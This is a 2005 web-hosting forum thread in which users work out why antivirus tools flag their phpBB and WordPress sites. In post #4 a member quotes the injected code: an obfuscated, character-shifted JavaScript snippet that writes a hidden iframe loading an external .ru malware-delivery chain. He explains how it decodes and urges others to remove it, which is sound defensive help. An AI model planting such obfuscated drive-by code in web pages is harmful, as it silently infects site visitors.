Welcome Guest ( Log In | Register )



 
Reply to this topicStart new topic
> Scanning My Site, on virusses
Moody
post Oct 4 2005, 03:04 PM
Post #1


Advanced Member
Group Icon

Group: Members
Posts: 185
Joined: 14-June 05
From: The Netherlands
Member No.: 6,228



Hi all, I think i have a problem, whenever i open a site on www.moody.astahost.com (my site) i get a virus waring from norton...is this my computer or my domain? If the domain, can I scan it somehow, so I can delete the virus? It's only when i open a site of that domain.....

Thx in advance,

Moody
Go to the top of the page
 
+Quote Post
hazeshow
post Oct 4 2005, 03:47 PM
Post #2


Premium Member
Group Icon

Group: Members
Posts: 230
Joined: 15-May 05
From: your sister
Member No.: 5,102



When I go to your site, all I can see is the Index Directory page, and nothing else, NO virus warnings or anything like that. Perhaps your Norton doesn't like astahost. wink.gif

GreetingZ
Go to the top of the page
 
+Quote Post
moonwitch
post Oct 4 2005, 05:36 PM
Post #3


Demonic Enforcer
Group Icon

Group: [HOSTED]
Posts: 597
Joined: 2-March 05
From: Belgium
Member No.: 2,861



Now I hate to admit it, but a friend when visiting my blog (hosted here) had the same issue. But then with trojans....

She also uses Norton...

My blog http://blog.other-net.com

Some more - Klass went to my site, which gives him an ActiveX error (though I at NO point used ActiveX in my site - only HTML - JavaScript and php) and that originated from an IP address other then my own sites IP (here's the WHOIS on the IP) What also worries me is - the 69.50.177.102/x379 seems to be a redirect to xawm.biz :cry:)

The issue in my case seems to be a theme I updated last night, it held a small section of JavaScript code that forced my visitors in IE to download a trojan from a RUssian site. So I urge you to manually check code - in WordPress also the Themes for JavaScript code.
Go to the top of the page
 
+Quote Post
jipman
post Oct 4 2005, 06:24 PM
Post #4


Pretty please?
Group Icon

Group: Members
Posts: 733
Joined: 28-November 04
From: Holland
Member No.: 1,552



Guys (moody, moonwitch), you both seem to share the same problem.

Moody is using a phpBB forum, and moon has problems with her log, that runs on Wordpress..

However, you both (well.. only moody now, moon deleted her problem a while ago). Have a piece of javascript at the bottom of your site.

CODE

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#v
furoolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>


When you decode it, you can see that it's actually a hidden frame which links to a attempts to open a site http://user19.iframe.ru/?s=1

Which, in return attempts to open these sites:

http://69.50.177.102/x379/ind.php

http://85.255.113.4/dl/adv400.php

The first one is some kinda of counter, which can be ignored

The second one attempts to load a certain applet, which I can't be bothered to checkout what it exactly does, probably something malicious :S

To make a long story short. This is what could've happened.

1. Both of you suffered from an automated exploit batch which put the code there.
2. You guys got your site hacked, because someone was bored
3. I think this is it, astahost has gotten hacked :|.

I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?).

Anyway, everyone, if you use any kind of common software, forums/msg's boards/blogs etc. etc..

Please check your site for above code and remove it. And report it ofcourse.
Go to the top of the page
 
+Quote Post
Neverseen
post Oct 4 2005, 09:15 PM
Post #5


Premium Member
Group Icon

Group: Members
Posts: 227
Joined: 25-April 05
Member No.: 4,369



I've got a phpBB forum on my website as well.. but never noticed any problems with antivirus e.t.c... hopefully it'll never happen
Go to the top of the page
 
+Quote Post
hazeshow
post Oct 4 2005, 10:46 PM
Post #6


Premium Member
Group Icon

Group: Members
Posts: 230
Joined: 15-May 05
From: your sister
Member No.: 5,102



I once installed a test forum here on astahost, but FORTUNATELY I can't find any of the malicious source code in my pages. I hope that nobody here on astahost is being hacked. sad.gif
Go to the top of the page
 
+Quote Post
Moody
post Oct 5 2005, 05:54 AM
Post #7


Advanced Member
Group Icon

Group: Members
Posts: 185
Joined: 14-June 05
From: The Netherlands
Member No.: 6,228



Oke guys, i can say, my problem is also a trojan. Norton says that, but where is that code, i mean in wich file, or do i have to check all my files? Pls help, cus i think my visitors don't like this.
Go to the top of the page
 
+Quote Post
Moody
post Oct 5 2005, 04:05 PM
Post #8


Advanced Member
Group Icon

Group: Members
Posts: 185
Joined: 14-June 05
From: The Netherlands
Member No.: 6,228



Oke guys, good news, i overwrited the templates subsilver folder and i dno't get the error from norton anymore, so i guess the trojan is away, but ofcourse i want to change my password now and it won't work i get this:

There was an error manipulating the password file.

Can you help me?
Go to the top of the page
 
+Quote Post
moonwitch
post Oct 5 2005, 09:49 PM
Post #9


Demonic Enforcer
Group Icon

Group: [HOSTED]
Posts: 597
Joined: 2-March 05
From: Belgium
Member No.: 2,861



In my case - I had to check the source code of my blog. Apparently the code got added to every footer.php file in all my skins for WordPress. And I deleted the code last night - to return and find the code came back sad.gif

Password changes, moody, is per request.
http://www.astahost.com/free-web-hosting-p...reset-f101.html
Go to the top of the page
 
+Quote Post
Nelson
post Oct 21 2006, 01:51 PM
Post #10


Member [ Level 1 ]
Group Icon

Group: Members
Posts: 34
Joined: 19-October 06
Member No.: 16,667



I think Cpanel comes with an Antivirus! You can scan your system with that. I haven't been hosted yet but my earlier host had an antivirus after a virus outbreak affecting all my php files ! Some 'iframe problem stuff!!!
Go to the top of the page
 
+Quote Post

Fast ReplyReply to this topicStart new topic

Collapse

> Similar Topics

Topics Topics
  1. Good Places To Advertise Your Site(20)
  2. Flash Site Software(14)
  3. Www.modthesims2.com - Sims 2 Mods Site(9)
  4. Hack This Site(30)
  5. Create A Site Without Cms But Just Dreamweaver?(6)
  6. Add A Forum To Your Site(23)
  7. Please Hack My Site(23)
  8. What Is The Best Photo Sharing Site?(20)
  9. Skemb -- Site Preview(5)
  10. How To Create Your Own Proxy Site (free And Easy)(14)
  11. Love Calculator(1)
  12. Youtube Videos(5)
  13. Web Host Review Site(1)
  14. Does This Site Mean Anything To Us…i Don’t Know U Tell Me?(4)
  15. My Site Got Hacked!(10)
  1. Site Down Again, Help Or Suggestions?(6)
  2. Time Travel?(4)
  3. Main Trap17 Site Is Down?(0)
  4. Request Form Site Suspended(4)
  5. Free Site(15)
  6. A Site I Put Together Over The Last 3 Days(7)
  7. Help Me Host My Site On My Pc(4)
  8. Nice Models And Free Models, New Site!(6)
  9. Free Fast Web Submission(2)
  10. Need To Copy An Entire Site..(10)
  11. Site Language(9)
  12. Advertisingknowhow(1)
  13. Promoting Your Site(2)


 



- Lo-Fi Version Time is now: 5th December 2008 - 12:25 PM